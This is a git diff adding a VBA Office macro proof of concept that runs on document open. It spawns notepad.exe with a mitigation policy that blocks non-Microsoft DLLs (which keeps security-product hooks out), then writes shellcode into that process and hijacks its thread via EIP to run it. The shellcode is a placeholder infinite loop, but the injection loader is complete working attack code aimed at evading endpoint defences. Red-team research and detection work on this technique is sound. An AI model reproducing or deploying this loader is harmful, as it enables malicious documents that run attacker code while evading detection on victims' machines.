xpn · October 26, 2019 23:31 · Oct 26, 2019
diff --git a/PCMPBNMBAO_x86_poc.vba b/PCMPBNMBAO_x86_poc.vba
@@ -0,0 +1,246 @@
+' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
+' by @_xpn_
+'
+' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
+
+Const EXTENDED_STARTUPINFO_PRESENT = &H80000
+Const HEAP_ZERO_MEMORY = &H8&
+Const SW_HIDE = &H0&
+Const MAX_PATH = 260
+Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
+Const MAXIMUM_SUPPORTED_EXTENSION = 512
+Const SIZE_OF_80387_REGISTERS = 80
+Const MEM_COMMIT = &H1000
+Const MEM_RESERVE = &H2000
+Const PAGE_READWRITE = &H4
+Const PAGE_EXECUTE_READWRITE = &H40
+Const CONTEXT_FULL = &H10007
+
+Private Type PROCESS_INFORMATION
+    hProcess As LongPtr
+    hThread As LongPtr
+    dwProcessId As Long
+    dwThreadId As Long
+End Type
+
+Private Type STARTUP_INFO
+    cb As Long
+    lpReserved As String
+    lpDesktop As String
+    lpTitle As String
+    dwX As Long
+    dwY As Long
+    dwXSize As Long
+    dwYSize As Long
+    dwXCountChars As Long
+    dwYCountChars As Long
+    dwFillAttribute As Long
+    dwFlags As Long
+    wShowWindow As Integer
+    cbReserved2 As Integer
+    lpReserved2 As Byte
+    hStdInput As LongPtr
+    hStdOutput As LongPtr
+    hStdError As LongPtr
+End Type
+
+Private Type STARTUPINFOEX
+    STARTUPINFO As STARTUP_INFO
+    lpAttributelist As LongPtr
+End Type
+
+Private Type DWORD64
+    dwPart1 As Long
+    dwPart2 As Long
+End Type
+
+Private Type FLOATING_SAVE_AREA
+    ControlWord As Long
+    StatusWord As Long
+    TagWord As Long
+    ErrorOffset As Long
+    ErrorSelector As Long
+    DataOffset As Long
+    DataSelector As Long
+    RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte
+    Spare0 As Long
+End Type
+
+Private Type CONTEXT
+    ContextFlags As Long
+    Dr0 As Long
+    Dr1 As Long
+    Dr2 As Long
+    Dr3 As Long
+    Dr6 As Long
+    Dr7 As Long
+    FloatSave As FLOATING_SAVE_AREA
+    SegGs As Long
+    SegFs As Long
+    SegEs As Long
+    SegDs As Long
+    Edi As Long
+    Esi As Long
+    Ebx As Long
+    Edx As Long
+    Ecx As Long
+    Eax As Long
+    Ebp As Long
+    Eip As Long
+    SegCs As Long
+    EFlags As Long
+    Esp As Long
+    SegSs As Long
+    ExtendedRegisters(MAXIMUM_SUPPORTED_EXTENSION - 1) As Byte
+End Type
+
+Private Declare PtrSafe Function CreateProcess Lib "kernel32.dll" Alias "CreateProcessA" ( _
+    ByVal lpApplicationName As String, _
+    ByVal lpCommandLine As String, _
+    lpProcessAttributes As Long, _
+    lpThreadAttributes As Long, _
+    ByVal bInheritHandles As Long, _
+    ByVal dwCreationFlags As Long, _
+    lpEnvironment As Any, _
+    ByVal lpCurrentDriectory As String, _
+    ByVal lpStartupInfo As LongPtr, _
+    lpProcessInformation As PROCESS_INFORMATION _
+) As Long
+
+Private Declare PtrSafe Function InitializeProcThreadAttributeList Lib "kernel32.dll" ( _
+    ByVal lpAttributelist As LongPtr, _
+    ByVal dwAttributeCount As Integer, _
+    ByVal dwFlags As Integer, _
+    ByRef lpSize As Integer _
+) As Boolean
+
+Private Declare PtrSafe Function UpdateProcThreadAttribute Lib "kernel32.dll" ( _
+    ByVal lpAttributelist As LongPtr, _
+    ByVal dwFlags As Integer, _
+    ByVal lpAttribute As Long, _
+    ByVal lpValue As LongPtr, _
+    ByVal cbSize As Integer, _
+    ByRef lpPreviousValue As Integer, _
+    ByRef lpReturnSize As Integer _
+) As Boolean
+
+Private Declare Function WriteProcessMemory Lib "kernel32.dll" ( _
+    ByVal hProcess As LongPtr, _
+    ByVal lpBaseAddress As Long, _
+    ByRef lpBuffer As Any, _
+    ByVal nSize As Long, _
+    ByVal lpNumberOfBytesWritten As Long _
+) As Boolean
+
+Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Long
+
+Private Declare PtrSafe Function GetThreadContext Lib "kernel32.dll" ( _
+    ByVal hThread As Long, _
+    lpContext As CONTEXT _
+) As Long
+
+Private Declare Function SetThreadContext Lib "kernel32.dll" ( _
+    ByVal hThread As Long, _
+    lpContext As CONTEXT _
+) As Long
+
+Private Declare PtrSafe Function HeapAlloc Lib "kernel32.dll" ( _
+    ByVal hHeap As LongPtr, _
+    ByVal dwFlags As Long, _
+    ByVal dwBytes As Long _
+) As LongPtr
+
+Private Declare PtrSafe Function GetProcessHeap Lib "kernel32.dll" () As LongPtr
+
+Private Declare Function VirtualAllocEx Lib "kernel32" ( _
+    ByVal hProcess As Long, _
+    ByVal lpAddress As Long, _
+    ByVal dwSize As Long, _
+    ByVal flAllocationType As Long, _
+    ByVal flProtect As Long _
+) As Long
+
+Sub AutoOpen()
+
+    Dim pi As PROCESS_INFORMATION
+    Dim si As STARTUPINFOEX
+    Dim nullStr As String
+    Dim pid, result As Integer
+    Dim threadAttribSize As Integer
+    Dim processPath As String
+    Dim val As DWORD64
+    Dim ctx As CONTEXT
+    Dim alloc As Long
+    Dim shellcode As Variant
+    Dim myByte As Long
+
+    ' Shellcode goes here (jmp $)
+    shellcode = Array(&HEB, &HFE)
+
+    ' Path of process to spawn
+    processPath = "C:\\windows\\system32\\notepad.exe"
+
+    ' Specifies PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON
+    val.dwPart1 = 0
+    val.dwPart2 = &H1000
+
+    ' Initialize process attribute list
+    result = InitializeProcThreadAttributeList(ByVal 0&, 1, 0, threadAttribSize)
+    si.lpAttributelist = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, threadAttribSize)
+    result = InitializeProcThreadAttributeList(si.lpAttributelist, 1, 0, threadAttribSize)
+
+    ' Set our mitigation policy
+    result = UpdateProcThreadAttribute( _
+        si.lpAttributelist, _
+        0, _
+        PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, _
+        VarPtr(val), _
+        Len(val), _
+        ByVal 0&, _
+        ByVal 0& _
+        )
+
+    si.STARTUPINFO.cb = LenB(si)
+    si.STARTUPINFO.dwFlags = 1
+
+    ' Spawn our process which will only allow MS signed DLL's
+    result = CreateProcess( _
+        nullStr, _
+        processPath, _
+        ByVal 0&, _
+        ByVal 0&, _
+        1&, _
+        &H80014, _
+        ByVal 0&, _
+        nullStr, _
+        VarPtr(si), _
+        pi _
+    )
+
+    ' Alloc memory (RWX for this POC, because... yolo) in process to write our shellcode to
+    alloc = VirtualAllocEx( _
+        pi.hProcess, _
+        0, _
+        11000, _
+        MEM_COMMIT + MEM_RESERVE, _
+        PAGE_EXECUTE_READWRITE _
+    )
+
+    ' Write our shellcode
+    For offset = LBound(shellcode) To UBound(shellcode)
+        myByte = shellcode(offset)
+        result = WriteProcessMemory(pi.hProcess, alloc + offset, myByte, 1, ByVal 0&)
+    Next offset
+
+    ' Point EIP register to allocated memory
+    ctx.ContextFlags = CONTEXT_FULL
+    result = GetThreadContext(pi.hThread, ctx)
+    ctx.Eip = alloc
+    result = SetThreadContext(pi.hThread, ctx)
+
+    ' Resume execution
+    ResumeThread (pi.hThread)
+
+End Sub
+
+